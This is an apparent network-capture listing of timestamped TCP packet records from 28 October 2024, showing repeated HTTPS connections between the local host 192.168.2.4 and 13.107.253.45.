                                                                                                                                                                            Oct 28, 2024 19:12:23.343449116 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.343498945 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.343576908 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.343753099 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.343769073 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.345747948 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346021891 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346416950 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.346445084 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346709013 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346785069 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346920967 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.346931934 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346946955 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347079992 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.347227097 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347255945 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.347435951 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347451925 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.347697973 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347703934 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.347870111 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347875118 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.348021984 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.348040104 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.348052025 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.348057985 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.350341082 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.350379944 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.350488901 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.350641012 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.350657940 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.484004974 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.484333038 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.485434055 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.485562086 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.485637903 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.485686064 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.485691071 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.485707998 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.485716105 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.485723019 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.388362885 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.388720989 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.388739109 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.404266119 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.404491901 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.404556990 CET49795443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.404731989 CET49795443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.404752016 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.414386034 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.414416075 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.414496899 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.414657116 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.414668083 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.856390953 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.856467009 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.856518984 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.856762886 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.856782913 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.856797934 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.856806040 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.860308886 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.860351086 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.860429049 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.860575914 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.860598087 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.975070000 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.975868940 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.975886106 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.976255894 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.976263046 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.114732981 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.114902973 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.115014076 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.115168095 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.115168095 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.115233898 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.115289927 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.118366957 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.118401051 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.118482113 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.118669987 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.118681908 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.158016920 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.158864021 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.158891916 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.159277916 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.159285069 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.176779032 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.177500010 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.177516937 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.177778959 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.177786112 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.181360960 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.181687117 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.181705952 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.182054996 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.182063103 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.302767038 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.303456068 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.303634882 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.303634882 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.303634882 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.306596994 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.306688070 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.306780100 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.307017088 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.307050943 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.319339037 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.319482088 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.319545031 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.319740057 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.319740057 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.319761038 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.319775105 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.320043087 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.320255041 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.320313931 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.320358038 CET49800443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.320373058 CET4434980013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.321969986 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322000980 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.322165966 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322180033 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322213888 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.322259903 CET49804443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322269917 CET4434980413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.322283030 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322463989 CET49805443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.322498083 CET4434980513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.603610992 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.603631973 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.625233889 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.625794888 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.625853062 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.626364946 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.626379013 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.774328947 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.774497986 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.774662018 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.774717093 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.774718046 CET49801443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.774751902 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.774797916 CET4434980113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.777896881 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.777935028 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:26.778012991 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.778157949 CET49806443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:26.778167009 CET4434980613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.061254978 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.062479973 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.062542915 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.070210934 CET49803443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.070264101 CET4434980313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.080728054 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:27.081211090 CET49802443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:27.081223965 CET4434980213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.705951929 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.983148098 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.983218908 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.983280897 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.983540058 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.983555079 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.983567953 CET49811443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.983572960 CET4434981113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.986855984 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.986886978 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:28.986975908 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.987174988 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:28.987188101 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.110619068 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.111268044 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.111346960 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.111774921 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.111787081 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.124495983 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.124900103 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.124923944 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.125462055 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.125467062 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.128177881 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.128525972 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.128557920 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.128870010 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.128881931 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.244849920 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.244939089 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.245003939 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.245193005 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.245235920 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.245270014 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.245286942 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.248332977 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.248420954 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.248528957 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.248711109 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.248769045 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.263561964 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.263631105 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.263683081 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.263865948 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.263886929 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.263899088 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.263904095 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.266614914 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.266649008 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.266757011 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.266906023 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.266920090 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.339510918 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.340027094 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.340048075 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.340497971 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.340502024 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.422641993 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.422805071 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.422894001 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.422982931 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.422982931 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.423029900 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.423058987 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.425734043 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.425802946 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.425916910 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.426067114 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.426112890 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.476345062 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.476588964 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.476636887 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.476864100 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.476895094 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.476907015 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.476912975 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.480122089 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.480163097 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.480238914 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.480417967 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.480436087 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.781092882 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.781734943 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.781764984 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.782268047 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.782283068 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.918432951 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.918665886 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.918736935 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.918802977 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.918836117 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.918872118 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.918885946 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.922197104 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.922240973 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.922316074 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.922475100 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.922492981 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.046304941 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.046895027 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.046937943 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.047430038 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.047446012 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.048336029 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.048744917 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.048768044 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.049187899 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.049200058 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.178826094 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.179392099 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.179414034 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.179913044 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.179924011 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.187208891 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.187428951 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.187542915 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.087603092 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.088428974 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.088454962 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.088916063 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.088923931 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.091845989 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.092236996 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.092250109 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.092606068 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.092609882 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.224145889 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.224911928 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.224944115 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.225374937 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.225384951 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.226200104 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.226667881 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.226701975 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.227247000 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.227264881 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.229413033 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.229599953 CET4434982713.107.253.45192.168.2.4
